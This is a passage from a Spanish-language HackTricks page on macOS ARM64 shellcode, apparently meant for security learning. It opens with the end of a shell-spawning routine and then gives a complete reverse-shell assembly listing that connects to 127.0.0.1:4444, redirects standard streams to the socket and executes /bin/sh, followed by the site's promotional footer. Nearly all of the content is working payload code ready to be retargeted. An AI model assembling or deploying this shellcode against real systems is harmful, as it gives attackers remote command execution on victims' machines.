|
|
call_dup:
|
|
// dup(c, 2) -> dup(c, 1) -> dup(c, 0)
|
|
mvn x0, x3
|
|
lsr x2, x2, #1
|
|
mov x1, x2
|
|
mov x16, #90
|
|
svc #0x1337
|
|
mov x10, xzr
|
|
cmp x10, x2
|
|
bne call_dup
|
|
|
|
call_execve:
|
|
// execve("/bin/sh", 0, 0)
|
|
mov x1, #0x622F
|
|
movk x1, #0x6E69, lsl #16
|
|
movk x1, #0x732F, lsl #32
|
|
movk x1, #0x68, lsl #48
|
|
str x1, [sp, #-8]
|
|
mov x1, #8
|
|
sub x0, sp, x1
|
|
mov x1, xzr
|
|
mov x2, xzr
|
|
mov x16, #59
|
|
svc #0x1337
|
|
```
|
|
#### Reverse shell
|
|
|
|
Desde [https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s), revshell a **127.0.0.1:4444**
|
|
```armasm
|
|
.section __TEXT,__text
|
|
.global _main
|
|
.align 2
|
|
_main:
|
|
call_socket:
|
|
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
|
|
mov x16, #97
|
|
lsr x1, x16, #6
|
|
lsl x0, x1, #1
|
|
mov x2, xzr
|
|
svc #0x1337
|
|
|
|
// save s
|
|
mvn x3, x0
|
|
|
|
call_connect:
|
|
/*
|
|
* connect(s, &sockaddr, 0x10)
|
|
*
|
|
* struct sockaddr_in {
|
|
* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10
|
|
* sa_family_t sin_family; // AF_INET = 2
|
|
* in_port_t sin_port; // 4444 = 0x115C
|
|
* struct in_addr sin_addr; // 127.0.0.1 (4 bytes)
|
|
* char sin_zero[8]; // Don't care
|
|
* };
|
|
*/
|
|
mov x1, #0x0210
|
|
movk x1, #0x5C11, lsl #16
|
|
movk x1, #0x007F, lsl #32
|
|
movk x1, #0x0100, lsl #48
|
|
str x1, [sp, #-8]
|
|
mov x2, #8
|
|
sub x1, sp, x2
|
|
mov x2, #16
|
|
mov x16, #98
|
|
svc #0x1337
|
|
|
|
lsr x2, x2, #2
|
|
|
|
call_dup:
|
|
// dup(s, 2) -> dup(s, 1) -> dup(s, 0)
|
|
mvn x0, x3
|
|
lsr x2, x2, #1
|
|
mov x1, x2
|
|
mov x16, #90
|
|
svc #0x1337
|
|
mov x10, xzr
|
|
cmp x10, x2
|
|
bne call_dup
|
|
|
|
call_execve:
|
|
// execve("/bin/sh", 0, 0)
|
|
mov x1, #0x622F
|
|
movk x1, #0x6E69, lsl #16
|
|
movk x1, #0x732F, lsl #32
|
|
movk x1, #0x68, lsl #48
|
|
str x1, [sp, #-8]
|
|
mov x1, #8
|
|
sub x0, sp, x1
|
|
mov x1, xzr
|
|
mov x2, xzr
|
|
mov x16, #59
|
|
svc #0x1337
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|